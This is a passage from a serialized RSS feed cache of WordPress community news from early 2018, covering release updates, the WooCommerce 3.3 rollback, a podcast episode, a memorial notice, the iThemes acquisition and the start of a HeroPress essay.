+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"Dev Blog: The Month in WordPress: January 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5541\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/the-month-in-wordpress-january-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3839:\"<p>Things got off to a gradual start in 2018 with momentum starting to pick up over the course of the month. There were some notable developments in January, including a new point release and work being done on other important areas of the WordPress project.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordPress 4.9.2 Security and Maintenance Release</h2>\n\n<p>On January 16, <a href=\"https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/\">WordPress 4.9.2 was released</a> to fix an important security issue with the media player, as well as a number of other smaller bugs. This release goes a long way to smoothing out the 4.9 release cycle with the next point release, v4.9.3, <a href=\"https://make.wordpress.org/core/2018/01/31/wordpress-4-9-3-release-pushed-to-february-5th/\">due in early February</a>.</p>\n\n<p>To get involved in building WordPress Core, jump into the #core channel in the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>, and follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>.</p>\n\n<h2>Updated Plugin Directory Guidelines</h2>\n\n<p>At the end of 2017, <a href=\"https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/\">the guidelines for the Plugin Directory</a> received a significant update to make them clearer and expanded to address certain situations. This does not necessarily make these guidelines complete, but rather more user-friendly and practical; they govern how developers build plugins for the Plugin Directory, so they need to evolve with the global community that the Directory serves.</p>\n\n<p>If you would like to contribute to these guidelines, you can make a pull request to <a href=\"https://github.com/WordPress/wporg-plugin-guidelines\">the GitHub repository</a> or email <a href=\"mailto:plugins@wordpress.org\">plugins@wordpress.org</a>. You can also jump into the #pluginreview channel in the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>Near the end of last year a lot of work was put into improving the standards in the WordPress core codebase and now <a href=\"https://make.wordpress.org/core/2017/11/30/wordpress-php-now-mostly-conforms-to-wordpress-coding-standards/\">the entire platform is at nearly 100% compliance with the WordPress coding standards</a>.</li>\n    <li>Gutenberg, the new editor coming to WordPress core in the next major release, <a href=\"https://make.wordpress.org/core/2018/01/25/whats-new-in-gutenberg-25th-january/\">was updated to v2.1 this month</a> with some great usability and technical improvements.</li>\n    <li>The Global Community Team is <a href=\"https://make.wordpress.org/community/2018/01/16/2018-goals-for-the-global-community-team-suggestions-time/\">taking suggestions for the goals of the Community program in 2018</a>.</li>\n    <li><a href=\"https://online.wpcampus.org/\">WPCampus Online</a>, a digital conference focused on WordPress in higher education, took place on January 30. The videos of the event sessions will be online soon.</li>\n    <li>A WordPress community member <a href=\"https://wptavern.com/new-toolkit-simplifies-the-process-of-creating-gutenberg-blocks\">has released a toolkit</a> to help developers build blocks for Gutenberg.</li>\n    <li>The community team that works to improve the WordPress hosting experience is relatively young, but <a href=\"https://make.wordpress.org/hosting/2018/01/25/hosting-meeting-notes-january-10-2018/\">they have been making some great progress recently</a>.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Feb 2018 08:10:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WPTavern: WordPress 4.9.3 Rescheduled for February 5th\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wptavern.com/wordpress-4-9-3-rescheduled-for-february-5th\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1336:\"<p>WordPress 4.9.3 is a maintenance release and was originally scheduled to be available on January 30th. However, due to ongoing tickets and a short time frame to test the <a href=\"https://make.wordpress.org/core/2018/02/01/wordpress-4-9-3-rc/\">release candidate</a>, it has <a href=\"https://make.wordpress.org/core/2018/01/31/wordpress-4-9-3-release-pushed-to-february-5th/\">been pushed back</a> to February 5th.</p>\n<p><a href=\"https://make.wordpress.org/core/2018/02/01/wordpress-4-9-3-rc/\">WordPress 4.9.3 RC 1</a> is available for testing. This release <a href=\"https://make.wordpress.org/core/2018/01/24/jshint-removed-from-codemirror-in-4-9-3/\">removes JSHint from the code editors</a> due to conflicts with the GPL License. If your code relies on JSHint from Core, <a href=\"https://core.trac.wordpress.org/ticket/42850\">developers encourage</a> you to update it to use a copy of JSHint.</p>\n<p>Other changes in 4.9.3 include, avoiding page scrolling when navigating the media modal, a handful of improvements to the customizer, <a href=\"https://make.wordpress.org/core/2018/01/26/wordpress-4-9-3-beta/\">and more</a>. Please test WordPress 4.9.3 on a staging site and if you encounter any bugs, you can report them on the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta section</a> of the support forums.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Feb 2018 08:09:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WooCommerce 3.3 Removed From Plugin Directory Due to Theme Conflicts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=77962\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://wptavern.com/woocommerce-3-3-removed-from-plugin-directory-due-to-theme-conflicts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3081:\"<p>Earlier this week, WooCommerce 3.3 <a href=\"https://wptavern.com/woocommerce-3-3-increases-theme-compatibility-auto-regenerates-thumbnails\">was released</a> and among the features was increased theme compatibility. However, soon after release, users of third-party themes <a href=\"https://wordpress.org/support/topic/wc-3-3-issues-with-categories-displaying-in-shop/\">reported issues</a> with categories displaying improperly.</p>\n<p>Despite it being a minor release that should be fully backwards compatible with previous releases up to 3.0, WooCommerce has removed 3.3 from the plugin directory and replaced it with 3.2.6.</p>\n<p>According <a href=\"https://woocommerce.wordpress.com/2018/02/01/woocommerce-3-3-1-status-update/\">to a post</a> on the project&#8217;s official blog, WooCommerce 3.3.1 will take the place of 3.3 and will include a fix for the category display issue.</p>\n<blockquote class=\"wp-block-quote\"><p>The issue affected themes with template overrides from 3.2.x which hadn’t been made compatible with 3.3. In general, <a href=\"https://github.com/woocommerce/woocommerce/wiki/Template-File-Guidelines-for-Devs-and-Theme-Authors#hook-vs-override---when-to-use-what\">we recommend that themes use hooks instead of template overrides.</a> Themes such as <a href=\"https://en-gb.wordpress.org/themes/storefront/\">Storefront</a> (which does not use template overrides) were compatible at launch.</p>\n<p><cite>WooCommerce Blog</cite></p></blockquote>\n<p>If you&#8217;ve already updated to WooCommerce 3.3 and your theme is compatible, you don&#8217;t need to make any changes. If your theme is not compatible, WooCommerce recommends checking with your theme&#8217;s author to see if a compatibility fix has been released.</p>\n<p>Users can also wait for the release of 3.3.1, update to the <a href=\"https://github.com/woocommerce/woocommerce/releases/tag/3.3.1-rc.1\">pre-release version</a> of 3.3.1, or use the <a href=\"https://wordpress.org/plugins/wp-rollback/\">WP-Rollback plugin</a> and revert back to 3.2.6. WooCommerce developers suggest only going the WP-Rollback route if you&#8217;re not comfortable installing pre-release software.</p>\n<p>Coen Jacobs, a former member of the WooCommerce development team, commented on Twitter that this was the first time he can remember that a release was reverted.</p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">Fun fact: As far as I recall, there has never been a release of WooCommerce that has been withdrawn before. During my time on the development team we have pushed fix releases on the same day as a big releases, but never was it reverted like this.</p>\n<p>&mdash; Coen Jacobs (@CoenJacobs) <a href=\"https://twitter.com/CoenJacobs/status/958768816808497152?ref_src=twsrc%5Etfw\">January 31, 2018</a></p></blockquote>\n<p></p>\n<p>The development team has tested 3.3.1 with more than 40 different themes and believe it is stable. However, they are exercising caution and thoroughly testing the fixes with more themes. Users can expect to see 3.3.1 officially released the week of February 5th.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Feb 2018 07:06:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: WPWeekly Episode 303 – Interview With Zac Gordon, Technology Educator\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wptavern.com?p=77901&preview=true&preview_id=77901\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wptavern.com/wpweekly-episode-303-interview-with-zac-gordon-technology-educator\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1902:\"<p>In this episode, <a href=\"http://jjj.me\">John James Jacoby</a> and I are joined by <a href=\"http://zacgordon.com/\">Zac Gordon</a>. We discussed a wide range of topics including, balancing freelance work with educating, an overview of Gutenberg from an educator&#8217;s perspective, and potential brand issues if the Gutenberg name <a href=\"githubhttps://github.com/WordPress/gutenberg/issues/4681\">was deprecated</a>. We also talked about some of the difficulties involved with <a href=\"https://gutenberg.courses/\">creating a course</a> around a feature that&#8217;s not yet part of WordPress core.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"https://ithemes.com/2018/01/31/ithemes-joining-the-liquid-web-family/\">iThemes Acquired by LiquidWeb</a><br />\n<a href=\"https://woocommerce.com/2018/01/whats-new-woocommerce-3-3/\">WooCommerce 3.3 Released</a><br />\n<a href=\"https://wptavern.com/updraftplus-acquires-easy-updates-manager-plugin\">Easy Updates Manager Acquired by UpdraftPlus</a></p>\n<h2>Picks of the Week:</h2>\n<p>John James Jacoby suggested <a href=\"https://www.beamauthentic.com/\">Beam Authentic</a>. Beam Authentic is a wearable, connected, smart button that can be programmed to display different images through an app.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 7th 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href=\"https://www.wptavern.com/feed/podcast\">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href=\"https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe\">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #303:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Feb 2018 02:12:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: Efrain Rivera, A Longtime Community Member, WordCamp Organizer, and Volunteer, Passes Away\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=77893\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://wptavern.com/efrain-rivera-a-longtime-community-member-wordcamp-organizer-and-volunteer-passes-away\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2776:\"<p>Efrain Rivera, who helped organize and volunteer at numerous WordCamps in Florida has passed away at the age of 47. The news was shared on Facebook by his sister on January 28th.</p>\n<img />Efrain Rivera and his wife at WordCamp Miami. Photo courtesy of David Bisset\n<p>David Bisset, organizer of WordCamp Miami and a well-known figure in the Florida WordPress community, <a href=\"http://davidbisset.com/efrain-rivera/\">shared his thoughts</a> on Rivera&#8217;s passing.</p>\n<blockquote><p>Efrain wasn’t just a fellow organizer, but also a supporter of the local WordPress meetups. There was no ulterior motive in anything that he did. Never once did he ask for anything – he was just happy to be there and help out. He was 100% about giving back to the WordPress community, but even if the community didn’t exist he would find a way to help out folks.</p>\n<p>Efrain wasn’t just a supporter and volunteer. He was a good friend to have – someone you could speak frankly too.</p></blockquote>\n<p>Rivera is being remembered as a kind, compassionate, and happy person by members of the community.</p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">I’m so sorry, he was a pleasure volunteering with,  <a href=\"https://twitter.com/EfrainWp?ref_src=twsrc%5Etfw\">@EfrainWp</a> was always happy to help and answer questions.</p>\n<p>&mdash; Rian M. Kinney, Esq. (@TheKinneyFirm) <a href=\"https://twitter.com/TheKinneyFirm/status/958855848784252928?ref_src=twsrc%5Etfw\">February 1, 2018</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">I remember his kindness David. What a great person and sad loss.</p>\n<p>&mdash; Diane Kinney (@dkinney) <a href=\"https://twitter.com/dkinney/status/958858994843611138?ref_src=twsrc%5Etfw\">February 1, 2018</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">Efrain was one of happiest, smiliest, caring people I’d ever hung out with at any WordPress event. <img src=\"https://s.w.org/images/core/emoji/2.4/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> <a href=\"https://t.co/qW7ChUmjX0\">https://t.co/qW7ChUmjX0</a></p>\n<p>&mdash; J ³ (@JJJ) <a href=\"https://twitter.com/JJJ/status/958448885030182913?ref_src=twsrc%5Etfw\">January 30, 2018</a></p></blockquote>\n<p></p>\n<p><a href=\"https://memorials.serenitymemorialchapels.com/efrain-rivera/3417849/obituary.php\">Memorial services are scheduled</a> for Saturday, February 3, 2018 from 4:00 P.M.-9:00 P.M. EST at Serenity Funeral Home and Cremation, 1450 S State Road 7, North Lauderdale, Florida 33068. The service will take place during visitation at 7PM. If you have any memories of meeting or hanging out with Efrain at any of the WordPress events in Florida, please share them in the comments.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Feb 2018 01:13:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"Post Status: Liquid Web has acquired iThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=41738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://poststatus.com/liquid-web-acquired-ithemes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5096:\"<p><a href=\"https://www.liquidweb.com/\">Liquid Web</a> has acquired <a href=\"https://ithemes.com/\">iThemes</a>, in an all cash deal that includes the entire iThemes team moving over to Liquid Web as an independent unit. Cory Miller &#8212; CEO of iThemes &#8212; will be the Business Manager of the new unit, with iThemes COO Matt Danner as the Director of Technology and Operations for iThemes. The entire team of twenty three people is staying on, and will continue to be headquartered in Oklahoma.</p>\n<p>This is not the first or last time we&#8217;ll see longstanding WordPress companies get rolled into large hosting providers. It&#8217;s a trend that is natural in any ecosystem as it matures, and iThemes was a clear and quality candidate for a host to target. Cory said the culture around Liquid Web, including their &#8220;heroic support,&#8221; but also the quality he sees in their management team, was a key motivator for them to go work with Liquid Web.</p>\n<p>As hosting companies evolve more and more to provide broader services for customers with managed WordPress offerings, there is less room for utility product creators to fill that gap.</p>\n<p>Backups are a fine example: customers may see less need for external backups if they have confidence that their hosting is managing backups properly. Security is another. These have been great products for iThemes, and still are &#8212; but their current markets are more for hosts without a managed experience, and that slice of the pie has been narrowing.</p>\n<p>iThemes has had a partnership with Liquid Web for about a year and a half now, which started by licensing iThemes Sync for Liquid Web&#8217;s WordPress hosting offering. They&#8217;ve slowly been integrating more features into the platform, and the acquisition will allow Liquid Web to further integrate iThemes&#8217; offerings, and allow iThemes to improve some of their product offerings with the backing of Liquid&#8217;s Web&#8217;s hosting infrastructure.</p>\n<p>I spoke to Cory Miller about the move, which is occurring not long after iThemes&#8217; ten year anniversary in business. He said he looks back every year and sees them as chapters in the iThemes story, and this feels just the same. He&#8217;s excited about what the backing from Liquid Web will allow them to do, and most importantly for him, the ability to keep supporting the team they have built over the years.</p>\n<p>Cory tells me he&#8217;s amazed that they&#8217;ve been able to build the company they have built, and neither he nor his business partners would have imagined it ten years ago. All equity holders had their shares purchased by Liquid Web, and Cory and the team will be Liquid Web employees.</p>\n<p>iThemes has iterated on the business many times over the years &#8212; as the name implies. Their theme business slowly dwindled in terms of the overall ratio of sales revenue it provided. BackupBuddy has long been a flagship, and they&#8217;ve found great success the past couple of years since they acquired and iterated on the iThemes Security product. He said that it took them experimenting a great deal &#8212; and like Exchange for eCommerce, and others &#8212; it didn&#8217;t always work out the way they hoped. But because they stayed agile and kept working at it, they&#8217;ve consistently been able to grow and diversify their product line.</p>\n<p>One practical component Liquid Web will be able to provide, as an example, is their data centers to power BackupBuddy and iThemes Stash storage and processing. iThemes has historically used Amazon, which Cory said really adds up and has started to eat into their own margins. Liquid Web will help them not only improve the offering but also to be able to perform those functions more affordably.</p>\n<p>For Liquid Web, this acquisition furthers their goal to integrate WordPress-specific functionality into their suite of WordPress hosting tools. They recently launched WooCommerce hosting on their platform, and the iThemes Sales Accelerator product can now be a core component of that offering. Additionally, the technology iThemes has built with BackupBuddy and Sync will further add to their platform.</p>\n<p>Beyond the technology and products, Liquid Web Vice President of Products and Innovation Chris Lema tells me it&#8217;s about the team:</p>\n<blockquote><p>This adds so much to what we’re doing with managed WordPress and managed WooCommerce, that it just made a lot of sense — both from a product perspective, and even more from a team perspective.</p></blockquote>\n<p>Having spent a lot of time with the management teams for each of these companies, I would agree that the culture fit is a really good one. And for Liquid Web, a company continuing to make its big push into the WordPress market, it is a solid strategic acquisition move that offers product dividends but more importantly adds a great and experienced WordPress team to their company.</p>\n<p><a href=\"https://ithemes.com/2018/01/31/ithemes-joining-the-liquid-web-family/\">Cory shares more</a> about the news on the iThemes blog.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 31 Jan 2018 17:12:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"HeroPress: The Journey: Curiosity, Challenge, Transformation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=2431\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:158:\"https://heropress.com/essays/journey-curiosity-challenge-transformation/#utm_source=rss&utm_medium=rss&utm_campaign=journey-curiosity-challenge-transformation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9293:\"<img width=\"960\" height=\"480\" src=\"https://heropress.com/wp-content/uploads/2018/01/013118-2-1024x512.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: My place in the world has transformed.\" /><p>When I look back on the past five years I’ve been working with WordPress, I feel the real weight of the journey I’ve had to get where I am. Much of it has been filled with challenge of both of the difficult and welcome variety. I’m an optimist and problem-solver to the core, but I sometimes wonder how I got through these past years. One thing is for certain, my involvement with WordPress, the opportunities and community around it, has been a force for so much good, motivation, and satisfaction in my life.</p>\n<h2>The Beginning</h2>\n<p>When I was introduced to WordPress, I was going through one of the most trying times of my adult life. My dad had suddenly passed away just a few years before. We didn’t have the best relationship, but his quirkiness, interest in esoteric things, and passion for food certainly rubbed off on me.</p>\n<p>I was living with roommates, but moved back home to be with my mom. Not too long after, she developed debilitating osteoarthritis in both of her hips. From a physically healthy yet grieving 52-year-old woman to eventually becoming handicap and walker-bound, needless to say, impacted our lives greatly. I became her caretaker, and I also worked retail part-time for the flexible schedule.</p>\n<blockquote><p>I felt emotionally exhausted, uninspired and quite lost with what my next steps would be.</p></blockquote>\n<p>I grew up using the internet fervently as a youth and in my college years. I met new friends, learned new skills, and traveled to new places thanks the endless source of information it provided for my active mind. So when a friend, now my mentor, John Bolyard, approached me to help him in his web marketing and development 